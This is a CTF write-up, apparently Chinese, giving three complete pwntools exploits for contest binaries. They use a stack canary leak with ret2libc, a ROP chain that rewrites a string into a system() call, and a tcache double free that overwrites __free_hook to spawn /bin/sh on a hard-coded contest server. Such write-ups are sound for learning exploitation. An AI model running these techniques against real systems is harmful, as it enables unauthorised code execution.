exec_comm.constprop+1162kaishell
PWN_MengxinStack
栈不会了orz
就是基本的栈溢出，操控 libc_start_main 这个函数来控制程序流程。需要将返回地址爆破到 libc_start_main+176，然后就是基本的 ROP 了。
exp:
#!/usr/bin/python2
from pwn import *
# Module-level tube handle. pwn() rebinds it (process() or remote()) and the
# retry loop in __main__ calls p.close() on it after a failed attempt.
p=0
def pwn(ip,port,debug):
    """Run one attempt of the MengxinStack exploit; return True when it finishes.

    Args:
        ip: remote host (ignored when ``debug == 1``).
        port: remote port (ignored when ``debug == 1``).
        debug: 1 spawns ``./mengxinpwn`` locally, any other value connects to
            ``ip:port``. Both branches load symbols from the local binary and
            its bundled libc, so the remote must run the same libc build.

    Returns:
        True once the interactive session ends. pwntools errors (EOF, timeout)
        are not caught here; the retry loop in ``__main__`` relies on that.

    Note:
        Python 2 only -- ``str`` is used as a raw byte buffer and
        ``libc.search(...).next()`` needs the Python 2 iterator protocol.
    """
    global p
    if debug==1:
        p=process('./mengxinpwn')
        #p=remote('124.156.121.112',28012)
        elf=ELF('./mengxinpwn')
        libc=elf.libc
    else:
        p=remote(ip,port)
        elf=ELF('./mengxinpwn')
        libc=elf.libc
    # Stage 1 (info leak): after 0x29 filler bytes the program appears to echo
    # memory past the end of the input, which is what the recv calls read.
    payload='a'*0x29
    p.sendafter('?',payload)
    p.recvuntil('a'*0x29)
    # The stack canary's low byte is 0x00 by design (it was clobbered by the
    # filler), so only 7 bytes are echoed and the leading zero is restored here.
    cannary=u64('\x00'+p.recv(7))
    # A stack pointer from the same leak; 304 is the distance from the leaked
    # value to the frame written in stage 2 -- fixed for this binary, presumably.
    stack_addr=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')- 304
    log.success('cannary: '+hex(cannary))
    log.success('stack: '+hex(stack_addr))
    # Stage 2: write the canary back unchanged (so the stack-protector check
    # passes), then a 2-byte partial overwrite of the return address. The
    # writeup says this is brute-forced toward __libc_start_main+176: the guess
    # only lands for some layouts, which is why __main__ retries on exceptions.
    p.send('a'*0x28+p64(cannary)+'a'*0x10+p64(stack_addr)+'\xf0\xd7')
    # Stage 3: repeat the over-read with a longer filler; the leaked pointer is
    # treated as __libc_start_main+240 to recover the libc base.
    p.sendafter('?','a'*0x48)
    libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__libc_start_main']-240
    system=libcbase+libc.sym['system']
    bin_sh=libcbase+libc.search('/bin/sh').next()
    # Gadget offset hard-coded for the matching libc build (not looked up).
    pop_rdi=libcbase+0x0000000000021102
    # Stage 4: canary again, then a ret2libc chain ending in system("/bin/sh").
    p.send('a'*0x28+p64(cannary)+'a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(system))
    p.interactive()
    return True
if __name__=="__main__":
    # Keep retrying until one attempt returns True. The partial return-address
    # overwrite inside pwn() is a guess, so most attempts die with an EOF or
    # timeout exception, which is swallowed here before the next try.
    # NOTE: if remote() itself raised, p is still the integer 0 from the module
    # top level and p.close() raises AttributeError, which ends the loop.
    while True:
        try:
            if pwn('124.156.121.112',28088,0)==True:
                break
        except Exception as exc:
            p.close()
PWN_MagicString
这里有个改变字符串的函数，将 ti 变成 sh 即可。
exp:
#!/usr/bin/python2
from pwn import *
def pwn():
    """Run the MagicString exploit once against the remote service.

    Python 2 only (``str`` is used as raw bytes). Every address below is
    hard-coded in the 0x40xxxx / 0x60xxxx range, i.e. the binary is built
    without PIE; with PIE enabled this chain would need a leak first.
    """
    #p=process('./mackstring')
    p=remote('124.156.121.112',28012)
    elf=ELF('./mackstring')
    # 0x2a8 bytes of filler reach the saved return address. No canary is read
    # back or written, so the binary presumably has no stack protector.
    # First leg: 0x400733 (presumably a pop-rdi gadget, since it is followed by a
    # single argument) loads 0x601048+5 and returns into 0x40062D, the
    # string-changing routine the writeup mentions.
    payload='a'*0x2a8+p64(0x400733)+p64(0x601048+5)+p64(0x40062D)
    # Second leg: same gadget (0x400732+1 == 0x400733), now with 0x601048 as the
    # argument, then system@plt -- the modified string becomes the command.
    payload+=p64(0x400732+1)+p64(0x601048)+p64(elf.plt['system'])
    p.sendlineafter('!',payload)
    p.interactive()
if __name__=="__main__":
    # Entry point: a single attempt, nothing here is brute-forced.
    pwn()
PWN_babyheap
tcache 的 double free 不难，好像可以布置好堆块、将 tcache 写坏，然后就行了。
#!/usr/bin/python2
from pwn import *
def pwn():
    """Run the babyheap exploit once against the remote service.

    Python 2 only (``str`` is used as raw bytes). The nested helpers drive the
    program's menu (1 = add, 2 = delete, 3 = show); the rest is the tcache
    double free described in the writeup. glibc 2.29 and later detect this
    exact double free (tcache key check) and abort on the second delete(0).
    """
    #p=process('./babyheap')
    p=remote('124.156.121.112',28025)
    elf=ELF('./babyheap')
    libc=elf.libc
    def add(data):
        # Menu option 1: allocate a chunk and store ``data`` in it.
        p.sendlineafter('>>','1')
        p.sendlineafter(':',data)
    def delete(idx):
        # Menu option 2: free chunk ``idx``. The pointer is evidently not
        # cleared afterwards, since delete(0) is issued twice below.
        p.sendlineafter('>>','2')
        p.sendlineafter(':',str(idx))
    def show(idx):
        # Menu option 3: print the contents of chunk ``idx``.
        p.sendlineafter('>>','3')
        p.sendlineafter(':',str(idx))
    add('\x01')
    add('\x02'*0x10)
    add('/bin/sh\x00')
    add('doudou3')
    add('doudou4')
    # Double free of chunk 0, then show(0) prints what the freed chunk now
    # holds -- a heap pointer written by the allocator.
    delete(0)
    delete(0)
    show(0)
    # u32 is enough because the non-PIE heap sits just above 0x602000; 0x260 is
    # the offset from the leaked pointer back to the heap start -- TODO confirm.
    heap_base=u32(p.recv(4))-0x260
    log.success('heap_base: '+hex(heap_base))
    # Allocations served from the corrupted bin; the data written here is
    # interpreted as chunk metadata, and 0x00602060 is presumably the program's
    # own chunk table, so that chunk 0 ends up aliasing free@GOT.
    add(p64(heap_base+0x50))
    add(p64(heap_base+0x50))
    add(p64(0x30)+p64(0x00602060))
    add(p64(elf.got['free']))
    show(0)
    # Leak free@libc (6 significant bytes, padded to 8) and derive the rest.
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
    system=libcbase+libc.sym['system']
    free_hook=libcbase+libc.sym['__free_hook']
    # Redirect a chunk to __free_hook, store system's address there, then free
    # the '/bin/sh' chunk (index 2) so free() dispatches to system.
    add(p64(free_hook))
    add(p64(0)+p64(free_hook))
    add(p64(system))
    delete(2)
    p.interactive()
if __name__=="__main__":
    # Entry point: a single attempt.
    pwn()